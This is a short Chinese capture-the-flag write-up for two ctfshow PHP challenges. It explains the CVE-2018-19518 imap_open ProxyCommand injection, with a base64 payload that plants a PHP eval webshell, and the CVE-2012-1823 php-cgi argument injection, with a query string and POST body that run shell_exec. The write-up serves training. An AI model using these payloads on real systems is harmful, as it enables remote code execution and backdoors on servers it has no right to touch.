ctfshow-phpcve

web312(CVE-2018-19518)-PHP-IMAP

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

影响:

PHP:5.6.38
系统:Debian/ubuntu
条件较高

ctfshow-phpcve_第1张图片

hostname=x+-oProxyCommand%3decho%09这里放执行的代码|base64%09-d|sh}a&username=1&password=1

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7JyA+IC92YXIvd3d3L2h0bWwvMS5waHA=|base64%09-d|sh}a&username=1&password=1

ctfshow-phpcve_第2张图片

web313(CVE-2012-1823)

CGI模式下的参数:
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

在这里插入图片描述

-d 执行命令

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
post:
<?php echo shell_exec('id');?>

ctfshow-phpcve_第3张图片

你可能感兴趣的:(php,ssh,ubuntu)